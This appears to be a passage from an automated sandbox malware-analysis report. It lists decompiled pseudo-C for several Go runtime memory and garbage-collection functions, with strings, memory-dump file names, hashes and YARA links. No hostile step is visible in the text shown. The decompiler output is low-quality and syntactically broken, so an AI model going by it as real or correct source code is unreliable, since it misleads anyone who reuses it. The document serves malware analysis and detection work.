                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base poin
                                                                                                                            • API String ID: 0-2094354515
                                                                                                                            • Opcode ID: 7cd413dadb349a4e9f1098b97ff9deaf6c1dd322112ea63ff5acea9dc3ff4657
                                                                                                                            • Instruction ID: 347dc7d8a2487f83865bec5aeacc90d014a69bdc21c36c85e99c907dc28a2e31
                                                                                                                            • Opcode Fuzzy Hash: 7cd413dadb349a4e9f1098b97ff9deaf6c1dd322112ea63ff5acea9dc3ff4657
                                                                                                                            • Instruction Fuzzy Hash: 44A1D03224AF4985DB06DF39E840396A765FB96BC8F44A222EA4E53779DF3CC085C700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01345B60 Relevance: 1.4, Strings: 1, Instructions: 176COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 57%
                                                                                                                            			E01345B60(void* __ebx, void* __ecx, void* __edx, void* __esp, signed long long __rax, signed long long __rbx, signed long long __rcx, signed long long __rdi, signed long long __rsi, long long __rbp, signed long long __r8, signed long long __r9, void* __r13, intOrPtr* __r14, signed long long _a8, signed long long _a16, signed long long _a24, signed long long _a32) {
				char _v8;
				long long _v16;
				void* _v24;
				signed long long _v32;
				signed long long _v40;
				signed long long _v48;
				signed long long _v56;
				signed long long _v64;
				signed long long _v72;
				signed long long _v80;
				signed long long _v88;
				void* _t52;
				void* _t56;
				void* _t59;
				signed int _t62;
				signed int _t64;
				void* _t65;
				void* _t77;
				signed long long _t79;
				signed long long _t87;
				signed long long _t90;
				signed long long _t92;
				signed long long _t96;
				signed long long _t97;
				signed long long _t99;
				signed long long _t101;
				signed long long _t102;
				signed long long _t103;
				signed long long _t105;
				signed long long _t108;
				void* _t113;
				signed long long _t118;
				signed long long _t119;
				intOrPtr _t121;
				signed long long _t122;
				signed long long _t123;
				signed long long _t124;
				signed long long _t125;
				signed long long _t126;
				intOrPtr _t127;
				signed long long _t130;
				signed long long _t131;
				void* _t133;
				intOrPtr* _t134;

				L0:
				while(1) {
					L0:
					_t134 = __r14;
					_t133 = __r13;
					_t122 = __r9;
					_t118 = __r8;
					_t109 = __rbp;
					_t102 = __rsi;
					_t99 = __rdi;
					_t92 = __rcx;
					_t87 = __rbx;
					_t79 = __rax;
					_t65 = __esp;
					_t59 = __ecx;
					_t56 = __ebx;
					if(_t113 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L39;
					}
					L1:
					_v8 = __rbp;
					_t109 =  &_v8;
					_a16 = __rbx;
					if(__rcx == 0) {
						L3:
						_t62 = 0;
					} else {
						L2:
						_t96 = __rbx;
						_t64 = 0;
						_t62 = 0;
						r8d = 0;
						r9d = 0;
						L32:
						_t127 =  *((intOrPtr*)(_t87 + 8));
						if(_t127 != 0) {
							L34:
							_t119 = _t122 + _t127;
							if(_t122 > _t119) {
								L38:
								_t79 = 0x138bee7;
								E01330BA0(0x138bee7, _t87, _t109);
								goto L39;
							} else {
								L35:
								_t99 = _t99 + 1;
								_t123 = _t102;
								goto L36;
							}
						} else {
							L33:
							_t123 = _t102;
							_t102 = _t118;
							_t119 = _t122;
							L36:
							_t122 = _t123 + 1;
							if(_t92 > _t122) {
								L31:
								_t87 = _t90 + 0x10;
								_t126 = _t102;
								_t102 = _t122;
								_t122 = _t119;
								_t118 = _t126;
								goto L32;
							} else {
								L37:
								_t87 = _t96;
								_t96 = _t99;
								_t99 = _t119;
							}
						}
					}
					L4:
					if(_t96 == 0) {
						L19:
						return 0;
					} else {
						L5:
						if(_t96 != 1) {
							L13:
							_t97 = _t102;
							_t64 = 0;
							goto L14;
						} else {
							L6:
							if(_t79 == 0) {
								L8:
								if(_t92 <= _t102) {
									goto L30;
								} else {
									L9:
									_t97 = _t102;
									_t103 = _t102 << 4;
									_v24 =  *((intOrPtr*)(_t87 + _t103));
									_v16 =  *((intOrPtr*)(_t87 + _t103 + 8));
									_t102 = _v24;
									_t121 =  *((intOrPtr*)(_t134 + 8));
									if( *_t134 > _t102) {
										_t64 = 0;
									} else {
										sil = _t102 - _t121 > 0;
									}
									_t64 = _t64 ^ 0x00000001;
									goto L14;
								}
							} else {
								L7:
								_t97 = _t102;
								_t64 = 1;
								L14:
								if(sil != 0) {
									L17:
									if(_t92 <= _t97) {
										L20:
										E013588C0();
										goto L21;
									} else {
										L18:
										return _t52;
									}
								} else {
									L15:
									_a24 = _t92;
									_a16 = _t87;
									_t90 = _t99;
									_t52 = E013462A0(_t52, _t56, _t65, _t79, _t90, _t109, _t133, _t134);
									_t96 = _a24;
									if(_t96 == 0) {
										L21:
										return _t52;
									} else {
										L16:
										_v48 = _t79;
										_v80 = _t90;
										_t119 = _a16;
										r9d = 0;
										while(1) {
											L23:
											_t125 =  *((intOrPtr*)(_t119 + 8));
											_t130 = _t99;
											_t99 =  >  ? _t125 : _t99;
											_t132 =  *_t119;
											if(_t92 !=  *_t119) {
												_v40 = _t92;
												_v56 = _t122;
												_v32 = _t119;
												_v64 = _t130;
												_v72 = _t102;
												_v88 = _t125;
												_t52 = L013591E0(_t59, _t62, _t64, _t65, _t92, _t132, _t99, _t122);
												_t96 = _a24;
												_t90 = _v80;
												_t102 = _v72;
												_t119 = _v32;
												_t122 = _v56;
												_t125 = _v88;
												_t130 = _v64;
												_t92 = _v40;
											} else {
												_t77 = _t130 - _t125;
											}
											if(_t77 < 0) {
												break;
											}
											L27:
											_t40 = _t122 + 1; // 0x1
											_t101 = _t40;
											_t105 = _t102 - _t125;
											_t131 = _t130 - _t125;
											_t124 = _t105;
											_t108 = _t92 + (_t125 &  ~_t105 >> 0x0000003f);
											if(_t96 > _t101) {
												L22:
												_t119 = _t119 + 0x10;
												_t92 = _t108;
												_t102 = _t124;
												_t122 = _t101;
												_t99 = _t131;
												continue;
											} else {
												L28:
												goto L21;
											}
											goto L40;
										}
										L29:
										_t92 = _t130;
										L01358980();
										L30:
										_t79 = _t102;
										E013588C0();
										goto L31;
									}
								}
							}
						}
					}
					L40:
					L39:
					_a8 = _t79;
					_a16 = _t87;
					_a24 = _t92;
					_a32 = _t99;
					E01356200(_t96, _t109);
				}
			}















































                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b60
                                                                                                                            0x01345b64
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01345b6a
                                                                                                                            0x01345b6e
                                                                                                                            0x01345b73
                                                                                                                            0x01345b78
                                                                                                                            0x01345b83
                                                                                                                            0x01345b97
                                                                                                                            0x01345b9b
                                                                                                                            0x01345b85
                                                                                                                            0x01345b85
                                                                                                                            0x01345b85
                                                                                                                            0x01345b88
                                                                                                                            0x01345b8a
                                                                                                                            0x01345b8c
                                                                                                                            0x01345b8f
                                                                                                                            0x01345d68
                                                                                                                            0x01345d68
                                                                                                                            0x01345d6f
                                                                                                                            0x01345d7f
                                                                                                                            0x01345d7f
                                                                                                                            0x01345d86
                                                                                                                            0x01345da5
                                                                                                                            0x01345da5
                                                                                                                            0x01345db1
                                                                                                                            0x00000000
                                                                                                                            0x01345d88
                                                                                                                            0x01345d88
                                                                                                                            0x01345d88
                                                                                                                            0x01345d8b
                                                                                                                            0x00000000
                                                                                                                            0x01345d8b
                                                                                                                            0x01345d71
                                                                                                                            0x01345d71
                                                                                                                            0x01345d74
                                                                                                                            0x01345d77
                                                                                                                            0x01345d7a
                                                                                                                            0x01345d8e
                                                                                                                            0x01345d8e
                                                                                                                            0x01345d94
                                                                                                                            0x01345d58
                                                                                                                            0x01345d58
                                                                                                                            0x01345d5c
                                                                                                                            0x01345d5f
                                                                                                                            0x01345d62
                                                                                                                            0x01345d65
                                                                                                                            0x00000000
                                                                                                                            0x01345d96
                                                                                                                            0x01345d96
                                                                                                                            0x01345d96
                                                                                                                            0x01345d99
                                                                                                                            0x01345d9c
                                                                                                                            0x01345d9c
                                                                                                                            0x01345d94
                                                                                                                            0x01345d6f
                                                                                                                            0x01345ba0
                                                                                                                            0x01345ba3
                                                                                                                            0x01345c65
                                                                                                                            0x01345c72
                                                                                                                            0x01345ba9
                                                                                                                            0x01345ba9
                                                                                                                            0x01345bad
                                                                                                                            0x01345c02
                                                                                                                            0x01345c02
                                                                                                                            0x01345c05
                                                                                                                            0x00000000
                                                                                                                            0x01345baf
                                                                                                                            0x01345baf
                                                                                                                            0x01345bb2
                                                                                                                            0x01345bc0
                                                                                                                            0x01345bc3
                                                                                                                            0x00000000
                                                                                                                            0x01345bc9
                                                                                                                            0x01345bc9
                                                                                                                            0x01345bc9
                                                                                                                            0x01345bcc
                                                                                                                            0x01345bd9
                                                                                                                            0x01345bde
                                                                                                                            0x01345be3
                                                                                                                            0x01345be8
                                                                                                                            0x01345bef
                                                                                                                            0x01345bfa
                                                                                                                            0x01345bf1
                                                                                                                            0x01345bf4
                                                                                                                            0x01345bf4
                                                                                                                            0x01345bfc
                                                                                                                            0x00000000
                                                                                                                            0x01345bfc
                                                                                                                            0x01345bb4
                                                                                                                            0x01345bb4
                                                                                                                            0x01345bb4
                                                                                                                            0x01345bb7
                                                                                                                            0x01345c07
                                                                                                                            0x01345c0a
                                                                                                                            0x01345c49
                                                                                                                            0x01345c4c
                                                                                                                            0x01345c73
                                                                                                                            0x01345c76
                                                                                                                            0x00000000
                                                                                                                            0x01345c4e
                                                                                                                            0x01345c4e
                                                                                                                            0x01345c64
                                                                                                                            0x01345c64
                                                                                                                            0x01345c0c
                                                                                                                            0x01345c0c
                                                                                                                            0x01345c0c
                                                                                                                            0x01345c14
                                                                                                                            0x01345c1c
                                                                                                                            0x01345c20
                                                                                                                            0x01345c25
                                                                                                                            0x01345c30
                                                                                                                            0x01345c7b
                                                                                                                            0x01345c84
                                                                                                                            0x01345c32
                                                                                                                            0x01345c32
                                                                                                                            0x01345c32
                                                                                                                            0x01345c37
                                                                                                                            0x01345c3c
                                                                                                                            0x01345c44
                                                                                                                            0x01345c95
                                                                                                                            0x01345c95
                                                                                                                            0x01345c95
                                                                                                                            0x01345c9c
                                                                                                                            0x01345c9f
                                                                                                                            0x01345ca3
                                                                                                                            0x01345ca9
                                                                                                                            0x01345cb0
                                                                                                                            0x01345cb5
                                                                                                                            0x01345cba
                                                                                                                            0x01345cbf
                                                                                                                            0x01345cc4
                                                                                                                            0x01345cc9
                                                                                                                            0x01345cd7
                                                                                                                            0x01345ce9
                                                                                                                            0x01345cf1
                                                                                                                            0x01345cf6
                                                                                                                            0x01345cfb
                                                                                                                            0x01345d00
                                                                                                                            0x01345d05
                                                                                                                            0x01345d08
                                                                                                                            0x01345d10
                                                                                                                            0x01345cab
                                                                                                                            0x01345cab
                                                                                                                            0x01345cab
                                                                                                                            0x01345d15
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01345d17
                                                                                                                            0x01345d17
                                                                                                                            0x01345d17
                                                                                                                            0x01345d1b
                                                                                                                            0x01345d1e
                                                                                                                            0x01345d21
                                                                                                                            0x01345d2e
                                                                                                                            0x01345d35
                                                                                                                            0x01345c85
                                                                                                                            0x01345c85
                                                                                                                            0x01345c89
                                                                                                                            0x01345c8c
                                                                                                                            0x01345c8f
                                                                                                                            0x01345c92
                                                                                                                            0x00000000
                                                                                                                            0x01345d40
                                                                                                                            0x01345d40
                                                                                                                            0x00000000
                                                                                                                            0x01345d40
                                                                                                                            0x00000000
                                                                                                                            0x01345d35
                                                                                                                            0x01345d45
                                                                                                                            0x01345d48
                                                                                                                            0x01345d4b
                                                                                                                            0x01345d50
                                                                                                                            0x01345d50
                                                                                                                            0x01345d53
                                                                                                                            0x00000000
                                                                                                                            0x01345d53
                                                                                                                            0x01345c30
                                                                                                                            0x01345c0a
                                                                                                                            0x01345bb2
                                                                                                                            0x01345bad
                                                                                                                            0x00000000
                                                                                                                            0x01345db7
                                                                                                                            0x01345db7
                                                                                                                            0x01345dbc
                                                                                                                            0x01345dc1
                                                                                                                            0x01345dc6
                                                                                                                            0x01345dcb
                                                                                                                            0x01345ddf

                                                                                                                            Strings
                                                                                                                            • string concatenation too longtimeBegin/EndPeriod not foundtoo many open files in system (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for Central European Standard TimeCentral Standard Time (Mexico)E. South America Standa, xrefs: 01345DA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: string concatenation too longtimeBegin/EndPeriod not foundtoo many open files in system (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for Central European Standard TimeCentral Standard Time (Mexico)E. South America Standa
                                                                                                                            • API String ID: 0-949991491
                                                                                                                            • Opcode ID: c57c09dc223a39bc06aa693b5a25d6d06647516bc96d3125632292cfbf49d6e9
                                                                                                                            • Instruction ID: 6356e58f3fa1f83a27f897a71d6ba8062aa5c0364f1b9d4e7b4bb51ba38f56cc
                                                                                                                            • Opcode Fuzzy Hash: c57c09dc223a39bc06aa693b5a25d6d06647516bc96d3125632292cfbf49d6e9
                                                                                                                            • Instruction Fuzzy Hash: 3E51D132B09BA483DB20CF56E44065ABBA5F795FC8F448116DE8D57F18CB38D9428B44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 013121C0 Relevance: 1.4, Strings: 1, Instructions: 130COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 21%
                                                                                                                            			E013121C0(void* __ebx, signed int __ecx, void* __esi, unsigned int __rbx, signed long long __rsi, long long __rbp, void* __r14, long long _a8, unsigned int _a16, signed int _a24) {
				char _v8;
				signed long long _v16;
				signed long long _v24;
				void* _v32;
				signed char _v33;
				signed int _t59;
				void* _t74;
				void* _t79;
				void* _t81;
				signed long long _t94;
				unsigned long long _t102;
				signed long long _t103;
				signed long long _t106;
				unsigned long long _t120;
				intOrPtr _t127;
				signed long long _t129;
				long long _t131;
				void* _t134;
				void* _t137;
				void* _t142;
				long long _t144;
				long long _t145;

				L0:
				while(1) {
					L0:
					_t146 = __r14;
					_t132 = __rbp;
					_t129 = __rsi;
					_t106 = __rbx;
					_t66 = __ecx;
					_t62 = __ebx;
					if(_t134 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L13;
					}
					L1:
					_v8 = __rbp;
					_t132 =  &_v8;
					_t122 = __rbx + 0x2000;
					if(__rbx > __rbx + 0x2000) {
						L12:
						E01330BA0(0x1388000, _t106, _t132);
						goto L13;
					}
					L2:
					_a16 = __rbx;
					_a24 = __ecx;
					_t94 =  !=  ? (__rbx >> 0xd) + 1 : __rbx >> 0xd;
					_v24 = _t94;
					_v16 = _t94 << 0xd;
					E01320260(__ebx, __ecx, _t74, _t94 << 0xd, _t94,  &_v8, _t137, __r14);
					_t66 = _a24 & 0xff;
					_v33 = _t66;
					_t106 = _v24;
					E01321D40(_t66, 0x14915c0, _t106,  &_v8, __r14);
					if(0x14915c0 == 0) {
						L11:
						E01330BA0(0x1388000, _t106, _t132);
						goto L12;
					}
					L3:
					_v32 = 0x14915c0;
					E0132A100(_t106, _t129,  &_v8, __r14);
					asm("lock dec eax");
					asm("lock dec eax");
					E0132A1E0( &_v8, __r14);
					_t106 =  *(_v32 + 0x20) << 0xd;
					E0131C140(_t62, 0x14cfc60, _t106, _v32, _t132, _t145, _t146);
					_t59 = _v33 & 0x000000ff;
					if(0x14cfc60 >= 0x88) {
						L10:
						_t66 = 0x88;
						E013588C0();
						goto L11;
					}
					L4:
					_t106 = _v32;
					E01329AA0(_t59, 0, _t79, _t81, 0x204f5fd + (_t122 + _t122 * 4) * 8, _t106, _t132, _t142, _t146);
					_t131 = _v32;
					 *((long long*)(_t131 + 0x70)) =  *((intOrPtr*)(_t131 + 0x18)) + _a16;
					_t120 =  *((intOrPtr*)(_t131 + 0x18));
					_t102 = 0 + _t120;
					_t122 = _t102;
					_t103 = _t102 >> 0x2a;
					if(_t103 >= 0x40) {
						L9:
						E013588E0();
						goto L10;
					}
					L5:
					_t127 =  *((intOrPtr*)( *((intOrPtr*)(0x14a1750 + _t103 * 8)) + (_t122 >> 0x16) * 8));
					if(_t127 == 0) {
						r9d = 0;
						r8d = 0;
						r11d = 0;
						r10d = 0;
					} else {
						_t144 = _t127 + (_t120 >> 5);
						r8d = r8d & 0x00000003;
						_t42 = _t127 + 0x1ffff; // 0x1ffff
						_t145 = _t42;
					}
					return E01310340(r8d, r9d, _t144, _t145, _t131, _t132, _t144, _t146);
					L14:
					L13:
					_a8 = 0x1388000;
					_a16 = _t106;
					_a24 = _t66;
					E01356200(_t122, _t132);
				}
			}

























                                                                                                                            0x013121c0
                                                                                                                            0x013121c0
                                                                                                                            0x013121c0
                                                                                                                            0x013121c0
                                                                                                                            0x013121c0
                                                                                                                            0x013121c0
                                                                                                                            0x013121c0
                                                                                                                            0x013121c0
                                                                                                                            0x013121c0
                                                                                                                            0x013121c4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013121ca
                                                                                                                            0x013121ce
                                                                                                                            0x013121d3
                                                                                                                            0x013121d8
                                                                                                                            0x013121e3
                                                                                                                            0x013123b9
                                                                                                                            0x013123c5
                                                                                                                            0x00000000
                                                                                                                            0x013123c5
                                                                                                                            0x013121e9
                                                                                                                            0x013121e9
                                                                                                                            0x013121ee
                                                                                                                            0x01312204
                                                                                                                            0x01312208
                                                                                                                            0x01312214
                                                                                                                            0x01312220
                                                                                                                            0x0131222b
                                                                                                                            0x0131222e
                                                                                                                            0x01312239
                                                                                                                            0x01312240
                                                                                                                            0x01312248
                                                                                                                            0x013123a8
                                                                                                                            0x013123b4
                                                                                                                            0x00000000
                                                                                                                            0x013123b4
                                                                                                                            0x0131224e
                                                                                                                            0x0131224e
                                                                                                                            0x0131225a
                                                                                                                            0x01312264
                                                                                                                            0x0131226f
                                                                                                                            0x01312280
                                                                                                                            0x0131228e
                                                                                                                            0x013122a0
                                                                                                                            0x013122a5
                                                                                                                            0x013122b0
                                                                                                                            0x0131239e
                                                                                                                            0x0131239e
                                                                                                                            0x013123a3
                                                                                                                            0x00000000
                                                                                                                            0x013123a3
                                                                                                                            0x013122b6
                                                                                                                            0x013122e0
                                                                                                                            0x013122e5
                                                                                                                            0x013122ea
                                                                                                                            0x013122fb
                                                                                                                            0x013122ff
                                                                                                                            0x0131230e
                                                                                                                            0x01312312
                                                                                                                            0x01312315
                                                                                                                            0x0131231d
                                                                                                                            0x01312394
                                                                                                                            0x01312399
                                                                                                                            0x00000000
                                                                                                                            0x01312399
                                                                                                                            0x0131231f
                                                                                                                            0x0131233a
                                                                                                                            0x01312343
                                                                                                                            0x01312367
                                                                                                                            0x0131236a
                                                                                                                            0x0131236d
                                                                                                                            0x01312370
                                                                                                                            0x01312345
                                                                                                                            0x01312352
                                                                                                                            0x0131235a
                                                                                                                            0x0131235e
                                                                                                                            0x0131235e
                                                                                                                            0x0131235e
                                                                                                                            0x01312393
                                                                                                                            0x00000000
                                                                                                                            0x013123cb
                                                                                                                            0x013123cb
                                                                                                                            0x013123d0
                                                                                                                            0x013123d5
                                                                                                                            0x013123d9
                                                                                                                            0x013123e8

                                                                                                                            Strings
                                                                                                                            • out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCrea, xrefs: 013123A8, 013123B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCrea
                                                                                                                            • API String ID: 0-3248205512
                                                                                                                            • Opcode ID: 3405c28cd91240638588fe0c7f3e4b7b13bcfff9ba20660eb6d9d0b94c90e271
                                                                                                                            • Instruction ID: 5e0085a0dc54636d1772de65ef4d911a266001bed00dda717593306ea3142696
                                                                                                                            • Opcode Fuzzy Hash: 3405c28cd91240638588fe0c7f3e4b7b13bcfff9ba20660eb6d9d0b94c90e271
                                                                                                                            • Instruction Fuzzy Hash: 9151C472314B8186DB14DB19E4903AEBB61F799BC8F985426EB8D43B28DF3CC549CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0131B1A0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • gcmarknewobject called while doing checkmarkout of memory allocating heap arena metadataruntime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-point, xrefs: 0131B28F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: gcmarknewobject called while doing checkmarkout of memory allocating heap arena metadataruntime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-point
                                                                                                                            • API String ID: 0-1626860508
                                                                                                                            • Opcode ID: 157fe05b71aef0e35dd590ef49dec0e67e3db617d23310726b497f02785eb728
                                                                                                                            • Instruction ID: 166118b256cb35b78318a44d1716d4108909ef00503d17a8d660865474d96b20
                                                                                                                            • Opcode Fuzzy Hash: 157fe05b71aef0e35dd590ef49dec0e67e3db617d23310726b497f02785eb728
                                                                                                                            • Instruction Fuzzy Hash: 1321B0B3711B8987EB059F19D4803EC6BA1F396F94F89A566CA4D4775ACA2CC146C300
